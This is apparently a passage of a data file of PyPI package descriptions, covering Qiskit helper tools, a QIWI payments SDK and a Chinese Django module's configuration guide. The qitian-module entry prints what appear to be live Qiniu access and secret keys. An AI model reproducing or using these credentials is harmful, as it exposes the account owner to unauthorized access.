countsqc=QuantumCircuit(2)creg1=ClassicalRegister(1)creg2=ClassicalRegister(1)qc.add_register(creg1)qc.add_register(creg2)qc.x(0)qc.measure(0,creg1[0])qc.measure(1,creg2[0])backend=Aer.get_backend(\"aer_simulator\")transpiled_circuit=transpile(qc,backend)result=backend.run(transpiled_circuit).result()parsed_counts=parse_counts(result,qc)# parsed_counts = {\"10\": 1024} while the get_counts from qiskit would return {\"0 1\": 1024}Note, qubits that had no measurements found for them are marked as - in the bitstringMore examplesexamples of usage can be found in a testing libraryqiskit-check"} +{"package": "qiskit-xyz2pdb", "pacakge-description": "qiskit-xyz2pdbThis program is designed primarily to convert XYZ files from the results ofQiskit's protein folding algorithm, but may also work with other similar XYZ files for protein coordinates. There are two options for the output: 1) a hetero atom (HETATM) format with connect records (CONECT), and 2) a conventional alpha carbon trace protein pdb format. In both outputs, each set of coordinates corresponds to the alpha carbon of each residue in the sequence.InstallTheqiskit-xyz2pdbpackage is available on the Python Package Index and Conda and can be installed with the following command line:# Install the package through PyPI\n$ pip install qiskit-xyz2pdb\n\n# Install the package through the Conda package manage\n$ conda install qiskit-xyz2pdbFeaturesThe hetero atom format is most useful for quick visualization, using a program such as NGL viewer. Note: this option assumes that the XYZ coordinates are all consecutively bound forming a continous single chain; it assumes that there are no side chains, and the CONECT records reflect this. How to run with this option:$ qiskit-xyz2pdb --in-xyz inputfile.xyz --out-pdb outputfile.pdb --hetero-atomsThe conventional alpha carbon trace format is more versatile and can be used for further research beyond visualization - such as reconstructing the full backbone and sidechains, adding a force field, and then performing molecular dynamics simulations. How to run with this option:$ qiskit-xyz2pdb --in-xyz inputfile.xyz --out-pdb outputfile.pdb --alpha-c-traces"} +{"package": "qiso", "pacakge-description": "Failed to fetch description. HTTP Status Code: 404"} +{"package": "qisquick", "pacakge-description": "QISquickHelper library for automating experimental setup, configuration, and data generation of Qiskit transpiler functionality.qisquick provides a test set of defined quantum circuits, functions to help modify transpiler configuration and passmanagers, and a database system for saving experimental data including backend state, transpilation statistics, and execution statistics.Using qisquickqisquick can be thought of as composed of two use-cases: experiment scripting and experiment execution. A quick use guide is provided here,\nbut more information can be found in the documentation.pdf file of this package, which includes documentation on individual modules,\nclasses, and functions.Experiment ScriptingResearchers must provide an experiment defined as a Callable that takes no arguments and returns circuit ids. A minimal example:def my_experiment():\n # Creates TestCircuit object and automatically generates a Premades circuit of type 'two_bell'\n circ = TestCircuit.generate(case='two_bell', size=4) \n\n return [circ.id]qisquick is in particular designed to ease experimenting with various transpiler configurations, and so many tools are provided to make scripting such experiments easier. A more comprehensive coverage of the purpose of the various classes can be found in the actual system documentation by calling help() on any function, but a few examples are provided here.The Premades class provides ~10 circuits designed to demonstrate various constraint topologies, be representative subcircuits, interesting primitives, or full algorithm implementations. All circuits can be generated using the same common interface, by providing a size (circuit width), and a truth value: a base state that should be encoded into oracles and used if the circuit requires a 'correct answer' (e.g. Grover's search).The TranspilerTools class provides helper methods to take qiskit-defined pre-populated PassManagers and exchange SWAP or layout passes with those defined by the researcher.The TestCircuit class allows researchers to easily generate statistics about TestCircuits, including transpile time, SWAPS inserted by transpiler routines, ideal distributions, and actual execution statistics.An experiment showing these behaviors:from qisquick.run_experiment import *\nfrom qisquick.circuits import Premades, TestCircuit\nfrom qisquick.transpilertools import get_transpiler_config, get_basic_pm, get_modified_pm\n\ndef my_experiment() -> list:\n # Make one of each kind of Premade and attach each to a TestCircuit\n size = 4\n tv = 3\n circs = create_all(size=size, truth_value=tv)\n\n # We could also generate the circs with a seed so they are reliably recreated\n # and also pass a filename to create image output of the circuits\n # circs = create_all(size=4, truth_value=3, seed = 404, filename='prepend_to_circs')\n\n # We could also add a specific type of circuit, defined in Premades.circ_lib\n new_test_circ = TestCircuit.generate(case='two_bell', size=size, truth_value=tv)\n circs.append(new_test_circ)\n\n # Or we can make an empty TestCircuit and add our own custom circ (or an existing Premades)\n tc = TestCircuit()\n custom_circ = Premades(size=size, truth_value=tv)\n custom_circ.h(0)\n custom_circ.cx(0, 1)\n custom_circ.measure(custom_circ.qr, custom_circ.cr)\n\n # You have to tell the TestCircuit what the size and tv params of the Premades is; should be fixed in the future\n tc.add_circ(custom_circ, size=size, truth_value=tv)\n circs.append(tc)\n\n # Now let's save a transpiler configuration for each circuit. \n provider = IBMQ.load_account()\n backend = provider.get_backend('MY PREFERRED BACKEND')\n\n # We must have a backend to target. This can be provided now, or at time of experiment execution.\n # Note that get_transpiler_config actually writes to each TestCircuit's transpiler_config param.\n # the configs returned are just for convenience if desired.\n configs = transpilertools.get_transpiler_config(circs)\n\n # Assume we have a new Passmanager SWAP pass we'd like to test out. This is provided by the researcher.\n my_swap = get_my_pass()\n\n # We generate a basic, optimization_level 3 PassManager for each of our TestCircuits, then exchange in our new pass\n pms = []\n for circ in circs:\n pm = get_basic_pm(circ.transpiler_config, level=3)\n modified_pm = transpilertools.get_modified_pm(pass_manager=pm, version=3, pass_type='swap', new_pass=my_swap)\n pms.append(modified_pm)\n\n # We can also execute experiments on our new pass\n # This tests transpilation time (average over attempts trials), generates compiled circs using the pm and stores\n # the compiled_circs attribute, and submits the job for execution on the backend chosen at runtime.\n TestCircuit.run_all_tests(circs, pms, attempts=5)\n\n # We return these ids of our Testcircuits\n return [circ.id for circ in circs]Experiment ExecutionOnce the researcher has an experiment they'd like to run, this can be handled very easily through one of two interfaces:For researchers who may want to modify actual qisquick functionality, or just prefer it, the experimental code can be inserted into therun_local_experiment()method ofrun_experiment.py. This module can then be called via normal CLI calls and will execute that experiment. Additionally, researchers can pass 3 flags (documentation also available by calling run_experiment.py -h):-v (-vv, -vvv): Increase the verbosity level of the logging system.-C, --Check_only: Checks only for previously run experimental results from IBM. Executes no experiment script.-R, --run_only: Runs experiment, but does not check for results from IBM. Runs local tests and, if called, send circuits for execution but quits immediately thereafter.Alternatively, in any module the researcher canfrom qisquick.run_experiment import run_experimentand can call this function to execute their experiment script. This function also accepts arguments equivalent to the previously mentioned flags and additionally allows the researcher to define their default backend, database location, etc ...Since the functions we used as examples when writing our script are built to use whatever default backend is called with run_experiment(), then this means that a researchercandefine a backend inside their script, but if they don't do so, then they can do it on calling the experiment and have their new default replicated automatically throughout their script.Instead of the CLI flags, this function accepts named params with the following keys: verbosity (int, range(4)), check_only (bool), run_only (bool).my_module.py\n from qisquick.run_experiment import run_experiment\n\n # verbosity = '-vv' (no flag is verbosity level 1)\n run_experiment(my_experiment, provider=my_provider, backend=my_backend, verbosity=3)If no backend and provider are provided, the library defaults are the public ibm-q provider and the public melbourne backend. Researchers can also pass a custom dblocation -- to create the db or reference an existing sqlite3 db of the correct structure. If no dblocation is provided, one is created at data/circuit_data.sqliteTips and TricksImport and use thePREFERRED_BACKENDglobal and theget_batchesfunction fromrun_experiment. PREFERRED_BACKEND\nhas a default set and can be changed by passing the preferred provider and preferred backend parameters torun_experiment. This way, changing one parameter can replicate backend changes throughout your entire experiment.'get_batches' is a utility function to to automate sending jobs to the IBM backends in polite chunk sizes.Best practice is to avoid making your own db. The library will automatically create one in your CWD/Data with the\nappropriate tables and fields."} +{"package": "qist", "pacakge-description": "Failed to fetch description. HTTP Status Code: 404"} +{"package": "qit", "pacakge-description": "IntroductionQuantum Information Toolkit (QIT) is a free, open source Python 3 package for various quantum\ninformation and computing -related purposes, released under GNU GPL v3. It is a descendant of the\nMATLAB Quantum Information Toolkit, and has considerably more functionality.The latest version can be found onour website.The toolkit is installed from the Python Package Index by$pipinstallqitor by cloning the Git repository, and installing directly from there:$gitclonehttps://git.code.sf.net/p/qit/code-pythonqit$cdqit$pipinstall.For interactive use, we recommend theIPython shell.To get an overview of the features and capabilities of the toolkit, run$pythonqit/examples.pyLicenseQIT is released under the GNU General Public License version 3.\nThis basically means that you can freely use, share and modify it as\nyou wish, as long as you give proper credit to the authors and do not\nchange the terms of the license. See LICENSE.txt for the details.Design notesThe main design goals for this toolkit are ease of use and comprehensiveness. It is primarily meant\nto be used as a tool for experimentation, hypothesis testing, small simulations, and learning, not\nfor computationally demanding simulations. Hence the efficiency of the algorithms used is not a\nnumber one priority.\nHowever, if you think an algorithm could be improved without compromising accuracy or\nmaintainability, please let the authors know or become a contributor yourself!ContributingQIT is an open source project and your contributions are welcome.\nTo keep the code readable and maintainable, we ask you to follow these\ncoding guidelines:Fully document all the modules, classes and functions using docstrings\n(purpose, calling syntax, output, approximations used, assumptions made\u2026).\nThe docstrings may contain reStructuredText markup for math, citations etc.\nUse the Google docstring style.Add relevant literature references todocs/refs.biband cite them in the function\nor module docstring usingsphinxcontrib-bibtexsyntax.Instead of using multiple similar functions, use a single function\nperforming multiple related tasks, see e.g.qit.state.State.measure.Raise an exception on invalid input.Use variables sparingly, give them descriptive (but short) names.Use brief comments to explain the logic of your code.When you add new functions also add tests for validating\nyour code. If you modify existing code, make sure you didn\u2019t break\nanything by checking that the tests still run successfully."} +{"package": "qitensor", "pacakge-description": "This module is essentially a wrapper for numpy that uses semantics useful for\nfinite dimensional quantum mechanics of many particles. In particular, this\nshould be useful for the study of quantum information and quantum computing.\nEach array is associated with a tensor-product Hilbert space. The underlying\nspaces can be bra spaces or ket spaces and are indexed using any finite\nsequence (typically a range of integers starting from zero, but any sequence is\nallowed). When arrays are multiplied, a tensor contraction is performed among\nthe bra spaces of the left array and the ket spaces of the right array.\nVarious linear algebra methods are available which are aware of the Hilbert\nspace tensor product structure.Component Hilbert spaces have string labels (e.g.qubit('a')*qubit('b')gives|a,b>).Component spaces are finite dimensional and are indexed either by integers or\nby any sequence (e.g. elements of a group).In Sage, it is possible to create arrays over the Symbolic Ring.Multiplication of arrays automatically contracts over the intersection of the\nbra space of the left factor and the ket space of the right factor.Linear algebra routines such as SVD are provided which are aware of the\nHilbert space labels."} +{"package": "qitian-django-starting", "pacakge-description": "No description available on PyPI."} +{"package": "qitian-module", "pacakge-description": "\u8d77\u7530\uff08\u82cf\u5dde\uff09\u8425\u9500\u7b56\u5212\u6709\u9650\u516c\u53f8DJANGO\u9879\u76ee\u5171\u7528\u6a21\u5757\u7cfb\u7edfRelease Summery1.7.9\u6dfb\u52a0urls_prod, \u9879\u76ee\u5f15\u7528\u65f6\uff0c\u76f4\u63a5\u5305\u542b\u6b64url\u8def\u7531\u6dfb\u52a0qitian-simditor\u5728\u9879\u76ee\u4f9d\u8d56\u5217\u8868\u914d\u7f6e\u6587\u4ef6settings\u6b64\u9879\u76ee\u5305\u542b\u57fa\u7840\u9879\u76ee\u914d\u7f6e\uff0c\u4e00\u822c\u9879\u76ee\u53ef\u4ee5\u76f4\u63a5\u590d\u5236settings\u914d\u7f6e\u4e3a\u57fa\u7840\u914d\u7f6e\u3002\u6b64\u914d\u7f6e\u4f1a\u6839\u636e\u65b0\u52a0\u5165\u7684\u6a21\u5757\u6765\u4fee\u6539\uff0c\u5df2\u6709\u9879\u76ee\u4e0d\u8981\u76f4\u63a5\u62f7\u8d1d\u3002\u9879\u76ee\u4f9d\u8d56\u6587\u4ef6\u6b64\u9879\u76ee\u7684\u4f9d\u8d56\u6587\u4ef6\u8981\u91c7\u7528\u624b\u52a8\u6dfb\u52a0\u7684\u65b9\u6cd5\uff0c\u907f\u514d\u4f7f\u7528freeze\u65b9\u5f0f\u3002\u76ee\u7684\u662f\u4e3a\u4e86\u8ba9\u4f9d\u8d56\u9879\u76ee\u7b80\u6d01\u6613\u8bfb\u3002\u7ba1\u7406\u754c\u9762\u7ba1\u7406\u754c\u9762\u4f7f\u7528grappelli,\u7ba1\u7406\u9996\u9875\u4f7f\u7528grappelli-dashboard\u9879\u76ee\u914d\u7f6e\u4fe1\u606fAPP\u5217\u8868INSTALLED_APPS = [\n 'grappelli.dashboard',\n 'grappelli',\n 'django.contrib.admin',\n 'django.contrib.auth',\n 'django.contrib.contenttypes',\n 'django.contrib.sessions',\n 'django.contrib.messages',\n 'django.contrib.staticfiles',\n 'django.contrib.sites',\n 'django_celery_beat',\n 'django_celery_results',\n 'smart_selects',\n 'easy_thumbnails',\n 'system',\n 'simditor',\n 'autopost',\n 'usercenter',\n 'taggit',\n 'taggit_labels',\n 'taggit_helpers',\n]\u5728middleware\u4e2d\u6dfb\u52a0'system.middleware.site.CurrentSiteMiddleware',template.options\u6dfb\u52a0'system.context_processors.site_info',\u9759\u6001\u6587\u4ef6\u7b49\u914d\u7f6eLANGUAGE_CODE = 'zh-hans'\n\nTIME_ZONE = 'Asia/Shanghai'\n\nUSE_I18N = True\n\nUSE_L10N = True\n\nUSE_TZ = True\n\nLANGUAGES = (\n ('en', ('English',)),\n ('zh-hans', ('\u4e2d\u6587\u7b80\u4f53',)),\n)\n\n# \u7ffb\u8bd1\u6587\u4ef6\u6240\u5728\u76ee\u5f55\uff0c\u9700\u8981\u624b\u5de5\u521b\u5efa\nLOCALE_PATHS = (\n os.path.join(BASE_DIR, 'locale'),\n)\n# Static files (CSS, JavaScript, Images)\n# https://docs.djangoproject.com/en/2.1/howto/static-files/\n\nSTATIC_URL = '/static/'\n\nSTATICFILES_DIRS = [\n os.path.join(BASE_DIR, \"static\"),\n 'static/',\n]\n\nSTATIC_ROOT = 'pub_static/'\nSTATICFILES_FINDERS = (\n \"django.contrib.staticfiles.finders.FileSystemFinder\",\n \"django.contrib.staticfiles.finders.AppDirectoriesFinder\"\n)\n# \u9759\u6001\u6587\u4ef6\u7248\u672c\uff0c\u53d1\u5e03\u540e\uff0c\u6709js,css\u6587\u4ef6\u53d8\u52a8\u9700\u66f4\u6362\nSTATIC_VERSION = 0.1\n# \u9879\u76ee\u652f\u4ed8\u8bbe\u7f6e\nAES_KEY = env.str('AES_KEY')\nPAY_PROJECT_ID = env.int('PAY_PROJECT_ID')\nPAY_URL = 'https://pay.qitian.biz/pay/index/%d/' % PAY_PROJECT_ID\n# SMS\u6a21\u677f, \u4e0d\u540c\u9879\u76ee\u9700\u8981\u4fee\u6539\nSMS_TEMPLATE = {\n 'register': '\u3010\u5a31\u4e50\u4fe1\u606f\u7f51\u3011\u4eb2\u7231\u7684{name}\u8d35\u5bbe\uff0c\u60a8\u7684\u9a8c\u8bc1\u7801\u662f{code}\u3002\u6709\u6548\u671f\u4e3a{time}\u5206\u949f\uff0c\u8bf7\u5c3d\u5feb\u9a8c\u8bc1',\n 'notice': '\u3010\u5a31\u4e50\u4fe1\u606f\u7f51\u3011\u4e3b\u4eba\uff0c\u5ba2\u6237\uff1a{name}\u5df2\u652f\u4ed8\u8ba2\u5355:{order}\uff0c\u8bf7\u60a8\u53ca\u65f6\u5904\u7406\uff01',\n 'reg_tel_admin': '\u3010\u5a31\u4e50\u4fe1\u606f\u7f51\u3011\u6709\u624b\u673a\u53f7\uff1a{tel} \u7528\u6237\u4e8e{time}\u6ce8\u518c\u4e86{site}, \u8bf7\u5c3d\u5feb\u8054\u7cfb\u3002',\n}\nSMS_TIMES = 3\n\n# \u8bbe\u7f6e\u7528\u6237\u5c5e\u6027\nAUTH_PROFILE_MODULE = 'usercenter.QtUser'\n\n# \u63a5\u53e3\u5b9a\u4e49\nREST_FRAMEWORK = {\n 'DEFAULT_PAGINATION_CLASS': 'rest_framework.pagination.LimitOffsetPagination',\n 'PAGE_SIZE': 20,\n 'page_query_param': 'page',\n}\n\nSHOW_TJ = env.bool('SHOW_TJ')\n\nSITE_NAME = env.str('SITE_NAME')\n\nGRAPPELLI_INDEX_DASHBOARD = 'dashboard.CustomIndexDashboard'\u7f13\u5b58\u4e0elog\u8bbe\u7f6e# \u8bbe\u7f6e\u7f13\u5b58\nCACHES = {\n \"default\": {\n \"BACKEND\": \"django_redis.cache.RedisCache\",\n \"LOCATION\": \"redis://127.0.0.1:6379/1\",\n \"OPTIONS\": {\n \"CLIENT_CLASS\": \"django_redis.client.DefaultClient\",\n # \"PASSWORD\": \"mysecret\"\n }\n }\n}\n\nLOGGING = {\n 'version': 1,\n 'disable_existing_loggers': False,\n 'formatters': {\n 'verbose': {\n 'format': ('%(asctime)s [%(process)d] [%(levelname)s] ' +\n 'pathname=%(pathname)s lineno=%(lineno)s ' +\n 'funcname=%(funcName)s %(message)s'),\n 'datefmt': '%Y-%m-%d %H:%M:%S',\n },\n 'simple': {\n 'format': '%(asctime)s [%(levelname)s] %(message)s',\n 'datefmt': '%Y-%m-%d %H:%M:%S',\n },\n },\n 'handlers': {\n 'console': {\n 'level': 'DEBUG',\n 'class': 'logging.StreamHandler',\n 'formatter': 'simple',\n },\n 'console-verbose': {\n 'level': 'DEBUG',\n 'class': 'logging.StreamHandler',\n 'formatter': 'verbose',\n },\n 'log_file': {\n 'level': 'DEBUG',\n 'class': 'logging.handlers.RotatingFileHandler',\n 'filename': os.path.join(BASE_DIR, 'django.log'),\n 'maxBytes': 33554432,\n 'formatter': 'verbose',\n },\n 'celery': {\n # 'level': 'INFO',\n # 'class': 'logging.handlers.RotatingFileHandler',\n 'level': 'DEBUG',\n 'formatter': 'simple',\n 'class': 'logging.handlers.TimedRotatingFileHandler',\n 'filename': 'celery.log',\n 'when': 'midnight'\n },\n\n },\n 'loggers': {\n 'django': {\n 'handlers': ['console', 'log_file'],\n 'propagate': True,\n 'level': 'INFO',\n },\n 'qt_celery': {\n 'handlers': ['celery'],\n 'level': 'INFO',\n 'propagate': True,\n },\n },\n}#\u4e03\u725b\u914d\u7f6e# \u4e03\u725b\u914d\u7f6e\nQINIU_ACCESS_KEY = 'r35LYq6an6L0FUAmDUhqDNXICbtZ5JI1vKWXBGKv'\nQINIU_SECRET_KEY = '8GkmiCK4_RjGWLKcJtjIl_8RH9QdnvSI_ulo7Apu'\nQINIU_URL = 'https://media.qitian.biz/'\nQINIU_BUCKET = 'qitian'\nQINIU_FOLDER = 'autopost'SIMDITOR\u914d\u7f6e#SIMDITOR\u914d\u7f6e\nSIMDITOR_UPLOAD_PATH = 'uploads/'\nSIMDITOR_IMAGE_BACKEND = 'pillow'\n\nSIMDITOR_TOOLBAR = [\n 'title', 'bold', 'italic', 'underline', 'strikethrough', 'fontScale',\n 'color', '|', 'ol', 'ul', 'blockquote', 'code', 'table', '|', 'link',\n 'image', 'hr', '|', 'indent', 'outdent', 'alignment', 'fullscreen',\n 'markdown', 'emoji'\n]\n\nSIMDITOR_CONFIGS = {\n 'toolbar': SIMDITOR_TOOLBAR,\n 'upload': {\n 'url': '/simditor/upload/',\n 'fileKey': 'upload',\n 'image_size': 1024 * 1024 * 4 # max image size 4MB\n },\n 'emoji': {\n 'imagePath': '/static/simditor/images/emoji/'\n }\n}urls.py\u4e2d\u6dfb\u52a0re_path(r'^simditor/', include('simditor.urls')),\u66f4\u65b0\u6b65\u9aa4autopost\u6a21\u5757\u9700\u8981\u5220\u9664:articlecategoryauthor\u4e00\u5b9a\u8981\u5148\u6dfb\u52a0\u4f5c\u8005\u90e8\u7f72\u6dfb\u52a0\u524d\u6bb5\u652f\u6301npm install -g vue-cli"} +{"package": "qitian-simditor", "pacakge-description": "pip install django-SimditorAddsimditorto yourINSTALLED_APPSsetting."} +{"package": "qito", "pacakge-description": "\u57fa\u4e8ePython,\u89c6\u9891\u3001\u97f3\u4e50\u3001\u76f4\u64ad\u4e0b\u8f7d\u5668,\u652f\u6301YouKu\u3001QQ\u3001Iqiyi\u7b49"} +{"package": "qiubai", "pacakge-description": "UNKNOWN"} +{"package": "qiu_nester", "pacakge-description": "UNKNOWN"} +{"package": "qiushi_mp4_download", "pacakge-description": "UNKNOWN"} +{"package": "qiutil", "pacakge-description": "qiutil provides helper functions for the ohsu-qin projects. See thedocumentationfor more information."} +{"package": "qiu-utils", "pacakge-description": "No description available on PyPI."} +{"package": "qiuwenbot", "pacakge-description": "Qiuwen Baike bot / \u6c42\u95fb\u767e\u79d1\u673a\u5668\u4ebaQiuwen Baikebot. /\u6c42\u95fb\u767e\u79d1\u673a\u5668\u4eba\u3002Features / \u529f\u80fdComprehensive Cleanup / \u7efc\u5408\u6cbb\u7406Cleaning up illegal references / \u6e05\u7406\u975e\u6cd5\u53c2\u8003\u6587\u732eCleaning up unsupported HTML tags / \u6e05\u7406\u4e0d\u652f\u6301\u7684HTML\u6807\u7b7eCleaning up expired templates / \u6e05\u7406\u8fc7\u671f\u6a21\u677fRemoving illegal flags of the Taiwan authorities / \u6e05\u7406\u53f0\u6e7e\u5f53\u5c40\u975e\u6cd5\u65d7\u5e1cRemoving illegal era names of the Taiwan authorities / \u6e05\u7406\u53f0\u6e7e\u5f53\u5c40\u975e\u6cd5\u5e74\u53f7Correcting terms related to Taiwan / \u4fee\u6b63\u6d89\u53f0\u7528\u8bedCorrecting terms related to Hong Kong / \u4fee\u6b63\u6d89\u6e2f\u7528\u8bedCorrecting terms related to politics / \u4fee\u6b63\u6d89\u653f\u7528\u8bedCorrecting terms related to \"Cultural Revolution\" / \u4fee\u6b63\u201c\u6587\u9769\u201d\u7528\u8bedMarking redundant entries caused by differences between Simplified and Traditional Chinese / \u6807\u8bb0\u7b80\u7e41\u5dee\u5f02\u9020\u6210\u7684\u91cd\u590d\u6761\u76eeDisclaimer / \u514d\u8d23\u58f0\u660eQiuwen Baike\u00ae is a trademark or registered trademark of the operator of Qiuwen Baike website or its affiliated entities. This project uses the trademark legitimately based on Article 59 of the \"Trademark Law of the People's Republic of China\". When using it in the modified version of this project, one should observe the \"Trademark Law\". / \u6c42\u95fb\u767e\u79d1\u00ae\u662f\u6c42\u95fb\u767e\u79d1\u7f51\u7ad9\u8fd0\u8425\u8005\u6216\u5176\u5173\u8054\u5b9e\u4f53\u7684\u5546\u6807\u6216\u6ce8\u518c\u5546\u6807\uff0c\u672c\u9879\u76ee\u57fa\u4e8e\u300a\u4e2d\u534e\u4eba\u6c11\u5171\u548c\u56fd\u5546\u6807\u6cd5\u300b\u7b2c\u4e94\u5341\u4e5d\u6761\u5bf9\u8be5\u5546\u6807\u6b63\u5f53\u4f7f\u7528\u3002\u5728\u672c\u9879\u76ee\u7684\u4fee\u6539\u7248\u672c\u4e2d\u4f7f\u7528\u65f6\uff0c\u5e94\u6ce8\u610f\u9075\u5b88\u300a\u5546\u6807\u6cd5\u300b\u3002"} +{"package": "qiuying", "pacakge-description": "Qiuying RPAA plain, simple and this-is-the-way library for RPA developing.Functionswebexcel"} +{"package": "qiuyuan", "pacakge-description": "No description available on PyPI."} +{"package": "qiwan", "pacakge-description": "UNKNOWN"} +{"package": "qiwi", "pacakge-description": "QIWI api"} +{"package": "qiwi-api", "pacakge-description": "qiwi_apiqiwi_api - \u043c\u043e\u0434\u0443\u043b\u044c \u0434\u043b\u044f \u0432\u0437\u0430\u0438\u043c\u043e\u0434\u0435\u0439\u0441\u0442\u0432\u0438\u044f \u0441 Qiwi API\u0414\u043e\u043a\u0443\u043c\u0435\u043d\u0442\u0430\u0446\u0438\u044f\u0414\u043e\u043a\u0443\u043c\u0435\u043d\u0442\u0430\u0446\u0438\u044f \u043d\u0430 \u0441\u0430\u0439\u0442\u0435 Qiwi\u0423\u0441\u0442\u0430\u043d\u043e\u0432\u043a\u0430$pipinstall--upgradeqiwi_api\u041f\u0440\u0438\u043c\u0435\u0440fromqiwi_apiimportQiwiapi=Qiwi('your_token_here')print(api.balance(only_balance=True))"} +{"package": "qiwiBillPaymentsAPI", "pacakge-description": "Universal payments API Python SDKPython SDK \u043c\u043e\u0434\u0443\u043b\u044c \u0434\u043b\u044f \u0432\u043d\u0435\u0434\u0440\u0435\u043d\u0438\u044f \u0435\u0434\u0438\u043d\u043e\u0433\u043e \u043f\u043b\u0430\u0442\u0435\u0436\u043d\u043e\u0433\u043e \u043f\u0440\u043e\u0442\u043e\u043a\u043e\u043b\u0430 \u044d\u043a\u0432\u0430\u0439\u0440\u0438\u043d\u0433\u0430 \u0438 QIWI \u041a\u043e\u0448\u0435\u043b\u044c\u043a\u0430.\u0423\u0441\u0442\u0430\u043d\u043e\u0432\u043a\u0430 \u0438 \u043f\u043e\u0434\u043a\u043b\u044e\u0447\u0435\u043d\u0438\u0435\u0423\u0441\u0442\u0430\u043d\u043e\u0432\u043a\u0430 \u0441 \u043f\u043e\u043c\u043e\u0449\u044c\u044e pip:pip3installqiwiBillPaymentsAPI\u041f\u043e\u0434\u043a\u043b\u044e\u0447\u0435\u043d\u0438\u0435:fromQiwiBillPaymentsAPIimportQiwiBillPaymentsAPI\u0414\u043e\u043a\u0443\u043c\u0435\u043d\u0442\u0430\u0446\u0438\u044fAPI P2P-\u0441\u0447\u0435\u0442\u043e\u0432 (\u0434\u043b\u044f \u0444\u0438\u0437\u0438\u0447\u0435\u0441\u043a\u0438\u0445 \u043b\u0438\u0446):https://developer.qiwi.com/ru/p2p-paymentsAPI QIWI \u041a\u0430\u0441\u0441\u044b (\u0434\u043b\u044f \u044e\u0440\u0438\u0434\u0438\u0447\u0435\u0441\u043a\u0438\u0445 \u043b\u0438\u0446):https://developer.qiwi.com/ru/bill-payments\u0410\u0432\u0442\u043e\u0440\u0438\u0437\u0430\u0446\u0438\u044f\u0414\u043b\u044f \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u044f SDK \u0442\u0440\u0435\u0431\u0443\u0435\u0442\u0441\u044fPUBLIC_KEY\u0438SECRET_KEY, \u043f\u043e\u0434\u0440\u043e\u0431\u043d\u043e\u0441\u0442\u0438 \u0432\u0434\u043e\u043a\u0443\u043c\u0435\u043d\u0442\u0430\u0446\u0438\u0438.PUBLIC_KEY='48e7qUxn9T7RyYE1MVZswX1FRSbE6iyCj2gCRwwF3Dnh5XrasNTx3BGPiMsyXQFNKQhvukniQG8RTVhYm3iPywsuk1L1SFfXsQkJYBHTMPqBjvf57v4MCz22zbCf67Lz6fdJFmn2UuziWYc2aubucguB9R7yhBvnVjdHV6tTDKNQvcPEQEAV*********'SECRET_KEY='eyJ2ZXJzaW9uIjoicmVzdF92MyIsImRhdGEiOnsibWVyY2hhbnRfaWQiOjUyNjgxMiwiYXBpX3VzZXJfaWQiOjcxNjI2MTk3LCJzZWNyZXQiOiJmZjBiZmJiM2UxYzc0MjY3YjIyZDIzOGYzMDBkNDhlYjhiNTnONPININONPN090MTg5Z**********************'qiwiApi=QiwiBillPaymentsAPI(PUBLIC_KEY,SECRET_KEY)\u0421\u043c\u0435\u043d\u0430PUBLIC_KEY\u0438SECRET_KEY\u043d\u0430 \u043d\u043e\u0432\u044b\u0439:NEW_PUBLIC_KEY='cmVzdF92MyIsImRhdGEiOnsibWVyY2hhbnRfaWQiOjUyNjgxMiwiYXBpX3VzZXJfaWQiOjcxNjI2MTk3LCJzZWNyZXQiOiJmZjBiZmJiM2UxYzc0MjY3YjIyZDIzOGYzMDBkNDhlYjhiNTk5NmIbhchhbbiNTk5NmIbhHBHIBDBI*****************'NEW_SECRET_KEY='kokoOKPzaW9uIjoicmVzdF92MyIsImRhdGEiOnsibWVyY2hhbnRfaWQiOjUyNjgxMiwiYXBpX3VzZXJfaWQiOjcxNjI2MTk3LCJzZWNyZXQiOiJmZjBiZmJiM2UxYzc0MjY3YjIyZDIzOGYzMDBkNDhlYjhiNTk5NmIbhchhbbHBHIBDBI**********************'qiwiApi.public_key=NEW_PUBLIC_KEYqiwiApi.secret_key=NEW_SECRET_KEY\u041f\u0440\u0438\u043c\u0435\u0440\u044b\u041f\u043e-\u0443\u043c\u043e\u043b\u0447\u0430\u043d\u0438\u044e \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044e \u0434\u043e\u0441\u0442\u0443\u043f\u043d\u043e \u043d\u0435\u0441\u043a\u043e\u043b\u044c\u043a\u043e \u0441\u043f\u043e\u0441\u043e\u0431\u043e\u0432 \u043e\u043f\u043b\u0430\u0442\u044b. \u0412 \u043f\u043b\u0430\u0442\u0435\u0436\u043d\u043e\u0439 \u0444\u043e\u0440\u043c\u0435 \u043f\u0430\u0440\u0430\u043c\u0435\u0442\u0440\u044b \u0441\u0447\u0435\u0442\u0430 \u043f\u0435\u0440\u0435\u0434\u0430\u044e\u0442\u0441\u044f \u0432 \u043e\u0442\u043a\u0440\u044b\u0442\u043e\u043c \u0432\u0438\u0434\u0435 \u0432 \u0441\u0441\u044b\u043b\u043a\u0435. \u0414\u0430\u043b\u0435\u0435 \u043a\u043b\u0438\u0435\u043d\u0442\u0443 \u043e\u0442\u043e\u0431\u0440\u0430\u0436\u0430\u0435\u0442\u0441\u044f \u0444\u043e\u0440\u043c\u0430 \u0441 \u0432\u044b\u0431\u043e\u0440\u043e\u043c \u0441\u043f\u043e\u0441\u043e\u0431\u0430 \u043e\u043f\u043b\u0430\u0442\u044b. \u041f\u0440\u0438 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u0438 \u044d\u0442\u043e\u0433\u043e \u0441\u043f\u043e\u0441\u043e\u0431\u0430 \u043d\u0435\u043b\u044c\u0437\u044f \u0433\u0430\u0440\u0430\u043d\u0442\u0438\u0440\u043e\u0432\u0430\u0442\u044c, \u0447\u0442\u043e \u0432\u0441\u0435 \u0441\u0447\u0435\u0442\u0430 \u0432\u044b\u0441\u0442\u0430\u0432\u043b\u0435\u043d\u044b \u043c\u0435\u0440\u0447\u0430\u043d\u0442\u043e\u043c, \u0432 \u043e\u0442\u043b\u0438\u0447\u0438\u0435 \u043e\u0442 \u0432\u044b\u0441\u0442\u0430\u0432\u043b\u0435\u043d\u0438\u044f \u043f\u043e API.\n\u0427\u0435\u0440\u0435\u0437 API \u0432\u0441\u0435 \u043f\u0430\u0440\u0430\u043c\u0435\u0442\u0440\u044b \u043f\u0435\u0440\u0435\u0434\u0430\u044e\u0442\u0441\u044f \u0432 \u0437\u0430\u043a\u0440\u044b\u0442\u043e\u043c \u0432\u0438\u0434\u0435 , \u0442\u0430\u043a \u0436\u0435 \u0432 API 